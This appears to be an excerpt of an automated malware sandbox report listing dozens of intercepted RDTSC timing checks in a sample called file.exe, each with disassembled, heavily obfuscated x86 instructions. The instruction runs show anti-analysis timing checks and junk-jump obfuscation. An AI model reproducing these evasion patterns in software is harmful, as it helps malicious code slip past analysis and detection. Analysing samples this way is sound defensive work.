Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270926 second address: 5270981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0AC43354h 0x00000008 call 00007F4DA4C5B31Dh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [775F65FCh] 0x00000016 pushad 0x00000017 mov di, 49F0h 0x0000001b mov edi, 52F4151Ch 0x00000020 popad 0x00000021 test eax, eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4DA4C5B321h 0x0000002a or eax, 434E4F76h 0x00000030 jmp 00007F4DA4C5B321h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 movzx esi, dx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270981 second address: 5270985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270985 second address: 52709E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F4E16F5E2F0h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4DA4C5B325h 0x00000014 sub esi, 6EB30B86h 0x0000001a jmp 00007F4DA4C5B321h 0x0000001f popfd 0x00000020 mov di, si 0x00000023 popad 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4DA4C5B329h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52709E2 second address: 5270A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4DA4C5D857h 0x00000008 pop esi 0x00000009 jmp 00007F4DA4C5D859h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F4DA4C5D84Dh 0x0000001b sub ax, 6656h 0x00000020 jmp 00007F4DA4C5D851h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F4DA4C5D850h 0x0000002c xor al, 00000078h 0x0000002f jmp 00007F4DA4C5D84Bh 0x00000034 popfd 0x00000035 popad 0x00000036 and ecx, 1Fh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F4DA4C5D855h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270A7D second address: 5270AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F0A2h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ror eax, cl 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushfd 0x00000014 jmp 00007F4DA4C5B31Ah 0x00000019 sbb cx, B538h 0x0000001e jmp 00007F4DA4C5B31Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270AAD second address: 5270B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov cl, 98h 0x0000000d pushfd 0x0000000e jmp 00007F4DA4C5D859h 0x00000013 xor ch, 00000036h 0x00000016 jmp 00007F4DA4C5D851h 0x0000001b popfd 0x0000001c popad 0x0000001d retn 0004h 0x00000020 nop 0x00000021 mov esi, eax 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 xor esi, dword ptr [008D2014h] 0x0000002c push eax 0x0000002d push eax 0x0000002e push eax 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 call 00007F4DA963E357h 0x00000038 push FFFFFFFEh 0x0000003a jmp 00007F4DA4C5D84Eh 0x0000003f pop eax 0x00000040 jmp 00007F4DA4C5D850h 0x00000045 ret 0x00000046 nop 0x00000047 push eax 0x00000048 call 00007F4DA963E372h 0x0000004d mov edi, edi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007F4DA4C5D84Dh 0x00000058 sub si, FFF6h 0x0000005d jmp 00007F4DA4C5D851h 0x00000062 popfd 0x00000063 mov ch, F4h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B50 second address: 5270B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B56 second address: 5270B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B5A second address: 5270B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ebx, 7DD4A5DEh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B80 second address: 5270B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B86 second address: 5270B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B8A second address: 5270B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B99 second address: 5270B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270B9D second address: 5270BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270BB3 second address: 5270BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5270BC5 second address: 5270C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4DA4C5D84Bh 0x00000015 and eax, 0B662D4Eh 0x0000001b jmp 00007F4DA4C5D859h 0x00000020 popfd 0x00000021 mov ah, 5Dh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200A9 second address: 52200AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200AF second address: 52200B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200B3 second address: 52200B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200B7 second address: 52200FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4DA4C5D855h 0x00000012 xor si, 3B06h 0x00000017 jmp 00007F4DA4C5D851h 0x0000001c popfd 0x0000001d mov ebx, eax 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200FA second address: 52200FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200FE second address: 522010D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522010D second address: 5220165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F4DA4C5B327h 0x00000010 mov bh, ch 0x00000012 pop edx 0x00000013 mov bh, ch 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 jmp 00007F4DA4C5B31Dh 0x0000001c mov ebx, dword ptr [ebp+10h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, 3FE1A9AEh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220165 second address: 522016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522016B second address: 52201E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F4DA4C5B328h 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F4DA4C5B321h 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007F4DA4C5B327h 0x0000001e and ch, 0000001Eh 0x00000021 jmp 00007F4DA4C5B329h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bh, 7Ah 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52201E0 second address: 52201E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52201E5 second address: 52201EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52201EB second address: 5220232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F4DA4C5D84Eh 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F4DA4C5D84Dh 0x0000001c call 00007F4DA4C5D850h 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220232 second address: 522026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F4DA4C5B321h 0x00000010 call 00007F4DA4C5B320h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522026E second address: 5220286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4DA4C5D84Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220286 second address: 522029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522029E second address: 5220328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov al, bl 0x0000000d mov ax, A3C5h 0x00000011 popad 0x00000012 je 00007F4E16FABBABh 0x00000018 pushad 0x00000019 pushad 0x0000001a call 00007F4DA4C5D84Ch 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F4DA4C5D84Bh 0x00000026 sub esi, 067F5F6Eh 0x0000002c jmp 00007F4DA4C5D859h 0x00000031 popfd 0x00000032 popad 0x00000033 pushfd 0x00000034 jmp 00007F4DA4C5D850h 0x00000039 adc ax, B2E8h 0x0000003e jmp 00007F4DA4C5D84Bh 0x00000043 popfd 0x00000044 popad 0x00000045 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov edx, 1023A656h 0x00000054 movsx edi, ax 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220328 second address: 52203B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DA4C5B31Fh 0x00000009 jmp 00007F4DA4C5B323h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F4DA4C5B328h 0x00000015 or si, 2AD8h 0x0000001a jmp 00007F4DA4C5B31Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 je 00007F4E16FA95C5h 0x00000029 pushad 0x0000002a mov edi, ecx 0x0000002c mov ax, CF87h 0x00000030 popad 0x00000031 mov edx, dword ptr [esi+44h] 0x00000034 jmp 00007F4DA4C5B31Ah 0x00000039 or edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4DA4C5B327h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52203B3 second address: 52203B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52203B9 second address: 52203BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52203BD second address: 52203D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52203D0 second address: 5220437 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5B31Fh 0x00000008 xor esi, 2D48B05Eh 0x0000000e jmp 00007F4DA4C5B329h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F4DA4C5B320h 0x0000001b mov dx, ax 0x0000001e pop esi 0x0000001f popad 0x00000020 jne 00007F4E16FA9585h 0x00000026 jmp 00007F4DA4C5B31Dh 0x0000002b test byte ptr [esi+48h], 00000001h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 movsx edx, si 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220437 second address: 5220457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D850h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F4E16FABA9Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov di, cx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220457 second address: 52204B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4DA4C5B328h 0x00000008 jmp 00007F4DA4C5B325h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 test bl, 00000007h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop edx 0x00000019 pushfd 0x0000001a jmp 00007F4DA4C5B322h 0x0000001f or si, BDD8h 0x00000024 jmp 00007F4DA4C5B31Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210864 second address: 5210868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210868 second address: 52108FA instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov ecx, edx 0x0000000b mov ebx, 742FAB80h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4DA4C5B325h 0x00000019 adc cl, FFFFFF86h 0x0000001c jmp 00007F4DA4C5B321h 0x00000021 popfd 0x00000022 pushad 0x00000023 mov bx, cx 0x00000026 call 00007F4DA4C5B31Ah 0x0000002b pop eax 0x0000002c popad 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F4DA4C5B321h 0x00000035 and esp, FFFFFFF8h 0x00000038 jmp 00007F4DA4C5B31Eh 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f mov cx, 5D5Dh 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F4DA4C5B325h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52108FA second address: 5210947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D851h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 282Eh 0x00000011 pushfd 0x00000012 jmp 00007F4DA4C5D84Fh 0x00000017 sub ax, F8DEh 0x0000001c jmp 00007F4DA4C5D859h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210947 second address: 521094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521094D second address: 521098E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D853h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4DA4C5D856h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4DA4C5D84Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 521098E second address: 52109F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F4DA4C5B326h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F4DA4C5B320h 0x00000017 sub ebx, ebx 0x00000019 jmp 00007F4DA4C5B321h 0x0000001e test esi, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, edx 0x00000025 jmp 00007F4DA4C5B31Fh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52109F1 second address: 52109F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52109F7 second address: 5210A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4E16FB0CA5h 0x0000000e jmp 00007F4DA4C5B327h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a pushad 0x0000001b mov eax, 489FF90Bh 0x00000020 push ecx 0x00000021 mov edx, 3FD2D132h 0x00000026 pop edi 0x00000027 popad 0x00000028 mov ecx, esi 0x0000002a pushad 0x0000002b call 00007F4DA4C5B324h 0x00000030 mov esi, 008E6CE1h 0x00000035 pop esi 0x00000036 pushfd 0x00000037 jmp 00007F4DA4C5B327h 0x0000003c sub esi, 1A6C808Eh 0x00000042 jmp 00007F4DA4C5B329h 0x00000047 popfd 0x00000048 popad 0x00000049 je 00007F4E16FB0C32h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 mov si, bx 0x00000055 mov ecx, edi 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210A96 second address: 5210A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210A9C second address: 5210B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [775F6968h], 00000002h 0x00000012 jmp 00007F4DA4C5B320h 0x00000017 jne 00007F4E16FB0C09h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F4DA4C5B31Dh 0x00000026 or si, D4D6h 0x0000002b jmp 00007F4DA4C5B321h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F4DA4C5B320h 0x00000037 jmp 00007F4DA4C5B325h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B19 second address: 5210B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B21 second address: 5210B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4DA4C5B31Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B38 second address: 5210BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F4DA4C5D84Eh 0x0000000e push eax 0x0000000f jmp 00007F4DA4C5D84Bh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F4DA4C5D854h 0x0000001c sbb ecx, 1A1F5A18h 0x00000022 jmp 00007F4DA4C5D84Bh 0x00000027 popfd 0x00000028 movzx ecx, dx 0x0000002b popad 0x0000002c push esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F4DA4C5D857h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220EF7 second address: 5220F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4DA4C5B31Ch 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220F15 second address: 5220F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220F19 second address: 5220F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220F36 second address: 5220F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4DA4C5D851h 0x00000016 jmp 00007F4DA4C5D84Bh 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220BCE second address: 5220BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Ah 0x00000009 popad 0x0000000a mov dx, cx 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220BE8 second address: 5220BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220BEC second address: 5220C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220C05 second address: 5220CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F4DA4C5D853h 0x0000000c jmp 00007F4DA4C5D853h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007F4DA4C5D859h 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F4DA4C5D84Eh 0x00000021 mov ebp, esp 0x00000023 jmp 00007F4DA4C5D850h 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov eax, ebx 0x0000002e pushfd 0x0000002f jmp 00007F4DA4C5D859h 0x00000034 or cx, FA36h 0x00000039 jmp 00007F4DA4C5D851h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0EBB second address: 52A0ED2 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx esi, dx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov cx, DB43h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0056 second address: 52A005C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
